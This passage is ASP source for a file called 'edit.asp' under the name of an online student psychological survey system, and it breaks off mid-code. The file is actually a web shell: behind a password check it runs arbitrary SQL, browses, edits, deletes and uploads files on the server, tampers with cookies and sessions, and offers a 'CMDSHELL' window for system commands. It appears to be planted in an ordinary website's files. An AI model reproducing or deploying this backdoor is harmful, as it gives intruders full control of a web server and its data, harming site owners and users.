edit.asp

网上学生心里调查系统

<center>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=proname%></title>
<style type="text/css">
<!--
td,textarea,body{
    font-size:9pt;
	}
table{
	background-color: #ffffff;
	border-top: 1px solid #cccccc;
	border-right: 1px solid #666666;
	border-bottom: 1px solid #666666;
	border-left: 1px solid #cccccc;
}
input{
	background-color: #efefef;
	border-top: 1px solid #cccccc;
	border-right: 1px solid #666666;
	border-bottom: 1px solid #666666;
	border-left: 1px solid #cccccc;
}
.small{font-size:8pt}
-->
</style>
<script language="javascript">
function yesok(){
if (confirm("确认要执行此操作吗？"))
		return true;
	else
		return false;
}
 function show(page,ptitle,w,h)
  {
window.open(page,ptitle,"toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=yes,width="+w+",height="+h);
  }

</script>
<%

Dim userpass,Conn,ConnStr,SQL,Help,dbp

repage=request.servervariables("http_referer")

if instr(repage,filename)=0 then repage=filename


if request.form("loginpass")<>"" then
logincheck(request.form("loginpass"))
showerr()
response.end
end if

if session("xl")<>userpass then
loginform()
showerr()
response.end
end if

if request.querystring("logout")="yes" then
logout()
showerr()
response.end
end if


if request("showpath")="yes" then
searchpath()
showerr()
response.end
end if

if request("editpath")<>"" then
edittxtfile(request("editpath"))
showerr()
response.end
end if

if request.form("textpath")<>"" then
call modifyfile(request.form("textpath"))
showerr()
response.end
end if

if request("delpath")<>"" then
call deletefile(request("delpath"))
showerr()
response.end
end if

if request("deldirpath")<>"" then
call deletedir(request("deldirpath"))
showerr()
response.end
end if

if request("copypath")<>"" then
call copyfile(request("copypath"))
showerr()
response.end
end if

if request("upfile")="yes" then
call upfile()
showerr()
response.end
end if

if request("showsc")="yes" then
co1=request.form("co1")
co2=request.form("co2")
cov=request.form("cov")
sess1=request.form("sess1")
sessv=request.form("sessv")

if co1<>"" and co2="" then
Response.Cookies(co1).Expires=Date+30
Response.Cookies(co1)=cov
end if

if request("delsession")<>"" then
session.Contents.Remove(request("delsession"))
response.redirect"?showsc=yes"
response.end
end if
if request("delcookies")<>"" then
Response.Cookies(request("delcookies")).Expires=Date-1
response.redirect"?showsc=yes"
response.end
end if

if co1<>"" and co2<>"" then
Response.Cookies(co1).Expires=Date+30
Response.Cookies(co1)(co2)=cov
end if

if sess1<>"" then
'session.abandon
session(sess1)=sessv
end if

showsc()
showerr()
response.end
end if

if request("cmdshell")="yes" then
cmdshell()
response.end
end if

if request.querystring("cleardata")="yes" then
session("dbsourcepath")=""
session("sqlstr")=""
end if

dbp=request("dbsourcepath")
if dbp<>"" then session("dbsourcepath")=trim(dbp)

if instr(session("dbsourcepath"),":")>0 or instr(LCase(session("dbsourcepath")),"sql server")>0 or instr(LCase(session("dbsourcepath")),"dsn=")>0 then
dbp=session("dbsourcepath")
else
dbp=Server.MapPath(session("dbsourcepath"))
end if

sqlstr=trim(request("sqlstr"))
if sqlstr<>"" then session("sqlstr")=sqlstr

Help="在线数据库管理，在线文件管理，CMD命令执行\n"
Help=Help & "文件上传,站内cookie,session管理\n"
%>
 

  <body topmargin="5" onkeydown="if(event.ctrlKey&&event.keyCode=='13'){form1.Submit.click();}">
<%sub showsc()%>
  <table width="700" border="0" cellpadding="0" cellspacing="0">
    <form name="form33" method="post" action="">
      <tr bgcolor="#003366"> 
        <td height="27"><font color="#FFFFFF">&nbsp;response.cookies</font><font color="#FFFFFF">(&quot; 
          <input name="co1" value="<%=co1%>" size="15">
          &quot;)(&quot; 
          <input name="co2" value="<%=co2%>" size="15">
          &quot;)=&quot; 
          <input name="cov" value="<%=cov%>" size="15">
          &quot; &nbsp; 
          <input name="Submit" type="submit"  value="设置COOKIES">
          </font></td>
      </tr>
    </form>
    <tr bgcolor="#990000"> 
      <td height="27" bgcolor="#efefef"> 
        <%
response.write"当前本站点保存在你机上的所有COOKIES如下：<br>"
For Each Item in Request.Cookies 
If Request.Cookies(Item).HasKeys Then 

For Each ItemKey in Request.Cookies(Item) 
Response.Write "<b>response.cookies('"&Item &"')('"&ItemKey&"')</b>="& Request.Cookies(Item)(ItemKey)& "<a href='?showsc=yes&delcookies="&item&"'>删</a><br>"
Next 
Else 
Response.Write "<b>response.cookies('"&Item &"')</b>="& Request.Cookies(Item) & "<a href='?showsc=yes&delcookies="&item&"'>删</a><br>"
End If 
Next
%>
      </td>
    </tr>
    <form name="form22" method="post" action="">
      <tr bgcolor="#990000"> 
        <td width="599" height="27"><font color="#FFFFFF">&nbsp;session(&quot; 
          <input name="sess1" value="<%=sess1%>" size="15">
          &quot;)=&quot; 
          <input name="sessv" value="<%=sessv%>" size="15">
          &quot; &nbsp; 
          <input name="Submit" type="submit" id="Submit" value="设置SESSION">
          &nbsp;</font></td>
      </tr>
    </form>
    <tr bgcolor="#990000"> 
      <td height="27" bgcolor="#efefef"> 
        <%
Response.Write "你在该站点上的SESSION数量: " & Session.Contents.Count&"<br>" 
For Each strName in Session.Contents
If IsArray(Session(strName)) then 
For iLoop = LBound(Session(strName)) to UBound(Session(strName)) 
Response.Write "session('"&strName & ")(" & iLoop & ") = " & Session(strName)(iLoop) & "<a href='?showsc=yes&delsession="&strname&"'>删</a><BR>" 
Next 
Else 
Response.Write "session('"&strName & "') = " & Session.Contents(strName) & "<a href='?showsc=yes&delsession="&strname&"'>删</a><BR>" 
End If 
next
%>
      </td>
    </tr>
  </table>
<%end sub%>
  <table width="700" border="0" cellpadding="0" cellspacing="0">
    <form name="form1" method="post" action="<%=filename%>">
    <tr> 
        <td width="581" height="27" colspan="2" align="center">ACCESS数据库路径[相对路径如:database/db.mdb 绝对路径：d:\web\database\db.mdb]<br>
		其它连接方式:[如：server=localhost;Database=dbname;Uid=userid;Pwd=password;Driver={SQL SERVER}]
          数据库连接串：<input name="dbsourcepath" value="<%=session("dbsourcepath")%>"  style="width:450;height:20"></td>
        <td width="119" rowspan="2" align="center"> <input name="sp" type="button" id="sp" onClick="show('<%=filename%>?showpath=yes','showfso',300,400)" value="文件" title="管理站内文件">
		<input name="scc" type="button" onClick="show('<%=filename%>?upfile=yes','upfile',400,180)" value="上传" title="上传文件到服务器">
          <input name="cy2" type="button" onClick="show('<%=filename%>?showsc=yes','showsc',760,200)" value="会话" title="管理站内SESSION,COOKIE">
          <input name="cleardata" type="button" id="cleardata" onClick="location='<%=filename%>?cleardata=yes'" value="初始">
          <input name="cmdshell" type="button" id="cmdshell" onClick="show('<%=filename%>?cmdshell=yes','cmdshell',500,400)" value="CMDSHELL" title="打开CMDSHELL执行窗口">
          <br> 
          <input name="help" type="button" value="帮助" onClick="confirm('<%=help%>')" title="显示帮助">
        <input name="cy" type="button" onClick="cyyj.style.display=''" value="常用" title="显示常用SQL命令按钮"> 
        <br>
        <input name="clear" type="button" value="清空" onClick="form1.sqlstr.value=''" title="清空SQL输入框内容">
        <input type="submit" name="Submit" value="执行" onClick="yesok()" title="执行SQL语句，默认是显示数据表名称"> 
      </td>
    </tr>
    <tr> 
      <td width="30" height="100" align="center" >SQL<br>
        语<br>句<br>输<br>
        入<br>        </td>
      <td align="center" ><textarea name="sqlstr" style="width:550;height:80"><%=session("sqlstr")%></textarea></td>
    </tr>
  </form>
  <tr align="center" id="cyyj" style="display:none"> 
    <td colspan="3"><input name="select" type="button"  onClick="form1.sqlstr.value=this.value" value="select * from"> 
      <input name="insert" type="button" onClick="form1.sqlstr.value=this.value" value="insert into">
        <input name="delete" type="button" onClick="form1.sqlstr.value=this.value" value="delete from"> 
      <input name="create" type="button" onClick="form1.sqlstr.value=this.value" value="create table"> 
      <br>
        <input name="update" type="button" onClick="form1.sqlstr.value=this.value" value="update">
        <input name="alter" type="button" onClick="form1.sqlstr.value=this.value" value="alter table"> 
      <input name="drop" type="button" onClick="form1.sqlstr.value=this.value" value="drop table"> 
      <input name="where" type="button" onClick="form1.sqlstr.value+=' '+this.value" value="where"> 
      <input name="order" type="button" onClick="form1.sqlstr.value+=' '+this.value" value="order by"> 
    </td>
  </tr>
</table>


  <%
Conntting(dbp)
response.write"<br>"

showtable()
response.write"<br><br>"

if session("sqlstr")<>"" then
  if LCase(left(session("sqlstr"),6))="select" then
       response.write "执行语句："&session("sqlstr")
       set rs=server.createobject("adodb.recordset")
	   rs.open session("sqlstr"),conn,1,1